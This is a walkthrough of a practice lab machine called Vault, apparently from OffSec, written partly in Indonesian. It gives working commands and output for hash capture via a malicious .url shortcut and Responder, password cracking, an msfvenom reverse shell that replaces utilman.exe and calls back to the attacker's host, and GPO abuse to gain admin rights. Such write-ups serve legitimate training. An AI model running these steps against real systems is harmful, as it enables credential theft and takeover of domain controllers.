Vault

Information Gathering

NMAP - Ports and Services

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-02-11 14:24:22Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-02-11T14:26:09+00:00; -2h46m21s from scanner time.
| ssl-cert: Subject: commonName=DC.vault.offsec
| Not valid before: 2025-02-10T14:19:17
|_Not valid after:  2025-08-12T14:19:17
| rdp-ntlm-info: 
|   Target_Name: VAULT
|   NetBIOS_Domain_Name: VAULT
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: vault.offsec
|   DNS_Computer_Name: DC.vault.offsec
|   DNS_Tree_Name: vault.offsec
|   Product_Version: 10.0.17763
|_  System_Time: 2025-02-11T14:25:23+00:00
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49703/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: -2h46m24s, deviation: 2s, median: -2h46m25s
| smb2-time: 
|   date: 2025-02-11T14:25:24
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 120.79 seconds

Initial Access

LDAP

cant access with anonymous

SMB

smbclient -L //192.168.155.172 -U ""

DocumentsShare terlihat menarik, mari enum

┌──(kali㉿kali)-[~/ctf/offsec/vault]
└─$ smbclient -N //192.168.155.172/DocumentsShare
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Fri Nov 19 03:59:02 2021
  ..                                  D        0  Fri Nov 19 03:59:02 2021

                7706623 blocks of size 4096. 1095253 blocks available
smb: \>

tidak ada hal menarik disini, tapi kita coba cek privielegenya

┌──(kali㉿kali)-[~/ctf/offsec/vault]
└─$ smbmap -H 192.168.155.172 -u 'guest'
[+] IP: 192.168.155.172:445     Name: 192.168.155.172           Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        DocumentsShare                                          READ, WRITE
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        SYSVOL                                                  NO ACCESS       Logon server share 
[*] Closed 1 connections

we can write in DocumentsShare, so kita coba impacket-psexec

┌──(kali㉿kali)-[~/ctf/offsec/vault]
└─$ impacket-psexec "guest":""@192.168.155.172            
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[*] Requesting shares on 192.168.155.172.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[*] Found writable share DocumentsShare
[*] Uploading file sVfwODlo.exe
[*] Opening SVCManager on 192.168.155.172.....
[-] Error opening SVCManager on 192.168.155.172.....
[-] Error performing the installation, cleaning up: Unable to open SVCManager

pake psexec ga ketrigger, mari coba cara lain dengan membuat shortcut url

[InternetShortcut]
URL=RANDOM
WorkingDirectory=RANDOM
IconFile=\\$IP\%USERNAME%.icon
IconIndex=1

save ke exploit.url, jalanin responder, dan upload ke server

#kali
sudo responder -I tun0 
#smb
put exploit.url

anirudh::VAULT:176fea045b6819ec:CF04D9605C2C33CBA588083F467035D5:010100000000000000351024887CDB018BF43481A55D195D00000000020008004F0044004A00450001001E00570049004E002D004A004600330056004700310039005A00500039004D0004003400570049004E002D004A004600330056004700310039005A00500039004D002E004F0044004A0045002E004C004F00430041004C00030014004F0044004A0045002E004C004F00430041004C00050014004F0044004A0045002E004C004F00430041004C000700080000351024887CDB01060004000200000008003000300000000000000001000000002000001830F0C706803F0173332094F5B2BB5FB0C4DAD79922348512363CC7DC51C8100A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00340035002E003100380036000000000000000000

dapat ntlmv2 anirudh, sekarang kita crack pake hashcat

hashcat pass.txt C:\tools\seclist\rockyou.txt
Dictionary cache hit:
* Filename..: C:\tools\seclist\rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Driver temperature threshold met on GPU #1. Expect reduced performance.
ANIRUDH::VAULT:176fea045b6819ec:cf04d9605c2c33cba588083f467035d5:010100000000000000351024887cdb018bf43481a55d195d00000000020008004f00044004a00450001001e00570049004e002d004a004600330056004700310039005a00500039004d0004003400570049004e002d004a0046003300560047003100390005a00500039004d002e004f0044004a0045002e004c004f00430041004c00030014004f0044004a0045002e004c004f00430041004c00050014004f0044004a00450002e004c004f00430041004c000700080000351024887cdb01060004000200000008003000300000000000000001000000002000001830f0c706803f0173332094f5bb2bb5fb0c4dad79922348512363cc7dc51c8100a001000000000000000000000000000000000000900260063006900660073002f003100390032002e0031003600380002e00340035002e003100380036000000000000000000:SecureHM

creds : anirudh:SecureHM

┌──(kali㉿kali)-[~/ctf/offsec/vault]
└─$ evil-winrm -i 192.168.155.172 -u anirudh -p SecureHM
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                               
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                                 
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\anirudh\Documents>

Privilege Escalation

SeRestorePrivilege

*Evil-WinRM* PS C:\Users\anirudh\desktop> move C:\windows\system32\utilman.exe C:\windows\system32\utilman.exe.old


┌──(kali㉿kali)-[~/ctf/offsec/vault]
└─$ msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.45.186 lport=1337 -f exe -o utilman.exe

*Evil-WinRM* PS C:\Users\anirudh\desktop> upload utilman.exe

*Evil-WinRM* PS C:\Users\anirudh\desktop> move utilman.exe C:\windows\system32\utilman.exe

┌──(kali㉿kali)-[~/ctf/offsec/vault]
└─$ nc -lnvp 1337

                                                                                                                                                                                         
┌──(kali㉿kali)-[~/ctf/offsec/vault]
└─$ rdesktop 192.168.155.172

WIN+U

GPO ABuse

get GPO

Get-GPO -All

get gpo id

Get-GPO -Name "Default Domain Policy"

check GPO Permission for current user

PS C:\Users\anirudh\Documents> Get-GPPermission -Guid 31b2f340-016d-11d2-945f-00c04fb984f9 -TargetType User -TargetName anirudh
Get-GPPermission -Guid 31b2f340-016d-11d2-945f-00c04fb984f9 -TargetType User -TargetName anirudh


Trustee     : anirudh
TrusteeType : User
Permission  : GpoEditDeleteModifySecurity
Inherited   : False

anirudh can edit, delete, modify

next, use SharpGPOAbuse.exe

PS C:\Users\anirudh\Documents>  .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount anirudh --GPOName "Default Domain Policy"
 .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount anirudh --GPOName "Default Domain Policy"
[+] Domain = vault.offsec
[+] Domain Controller = DC.vault.offsec
[+] Distinguished Name = CN=Policies,CN=System,DC=vault,DC=offsec
[+] SID Value of anirudh = S-1-5-21-537427935-490066102-1511301751-1103
[+] GUID of "Default Domain Policy" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] File exists: \\vault.offsec\SysVol\vault.offsec\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] The GPO does not specify any group memberships.
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!
PS C:\Users\anirudh\Documents>

last, update group policy

PS C:\Users\anirudh\Documents> gpupdate /force
gpupdate /force
Updating policy...

Computer Policy update has completed successfully.
User Policy update has completed successfully.

PS C:\Users\anirudh\Documents> net user anirudh
net user anirudh
User name                    anirudh
Full Name                    
Comment                      
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            11/19/2021 1:59:51 AM
Password expires             Never
Password changeable          11/20/2021 1:59:51 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   8/1/2024 6:10:08 PM

Logon hours allowed          All

Local Group Memberships      *Administrators       *Remote Management Use
                             *Server Operators     
Global Group memberships     *Domain Users         
The command completed successfully.

Machine Recap

port and service scan
smb null session
1. upload malicious file to capture NTLM Hash
got anirudh Hash and crack with Hashcat
abusing SeRestorePrivilege

PreviousHeist NextNagoya [soon]

Last updated 6 months ago